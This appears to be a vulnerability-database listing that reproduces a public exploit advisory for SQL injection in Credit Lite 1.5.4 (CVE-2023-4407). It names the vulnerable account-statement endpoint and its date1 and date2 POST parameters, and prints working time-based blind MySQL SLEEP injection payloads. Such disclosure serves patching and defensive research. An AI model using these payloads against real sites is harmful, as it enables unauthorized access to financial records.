Lucene search
K

Credit Lite 1.5.4 SQL Injection

🗓️ 21 Aug 2023 00:00:00Reported by CraCkErType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 303 Views

Credit Lite 1.5.4 SQL Injection - Unauthorized Database Acces

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Credit Lite 1.5.4 SQL Injection Vulnerability
21 Aug 202300:00
zdt
Circl
CVE-2023-4407
18 Aug 202316:38
circl
CNNVD
Codecanyon Credit Lite SQL注入漏洞
18 Aug 202300:00
cnnvd
CVE
CVE-2023-4407
18 Aug 202313:00
cve
Cvelist
CVE-2023-4407 Codecanyon Credit Lite POST Request account_statement sql injection
18 Aug 202313:00
cvelist
Exploit DB
Credit Lite 1.5.4 - SQL Injection
4 Sep 202300:00
exploitdb
EUVD
EUVD-2023-54270
3 Oct 202520:07
euvd
NVD
CVE-2023-4407
18 Aug 202313:15
nvd
Prion
Sql injection
18 Aug 202313:15
prion
Positive Technologies
PT-2023-29086 · Unknown · Codecanyon Credit Lite
18 Aug 202300:00
ptsecurity
Rows per page
`# Exploit Title: Credit Lite 1.5.4 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 31/07/2023  
# Vendor: Hobby-Tech  
# Vendor Homepage: https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392  
# Software Link: https://credit-lite.appshat.xyz/  
# Tested on: Windows 10 Pro  
# Impact: Database Access  
# CVE: CVE-2023-4407  
# CWE: CWE-89 - CWE-74 - CWE-707  
  
  
## Description  
  
SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.  
  
  
  
## Steps to Reproduce:  
  
To Catch the POST Request  
  
1. Visit [Account Statement] on this Path: https://website/portal/reports/account_statement  
  
2. Select [Start Date] + [End Date] + [Account Number] and Click on [Filter]  
  
  
  
Path: /portal/reports/account_statement  
  
POST parameter 'date1' is vulnerable to SQL Injection  
POST parameter 'date2' is vulnerable to SQL Injection  
  
-------------------------------------------------------------------------  
POST /portal/reports/account_statement HTTP/2  
  
_token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=[SQLi]&date2=[SQLi]&account_number=20005001  
-------------------------------------------------------------------------  
  
---  
Parameter: date1 (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&date2=2023-07-31&account_number=20005001  
  
Parameter: date2 (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31&date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&account_number=20005001  
---  
  
  
  
[-] Done  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Aug 2023 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.00073
303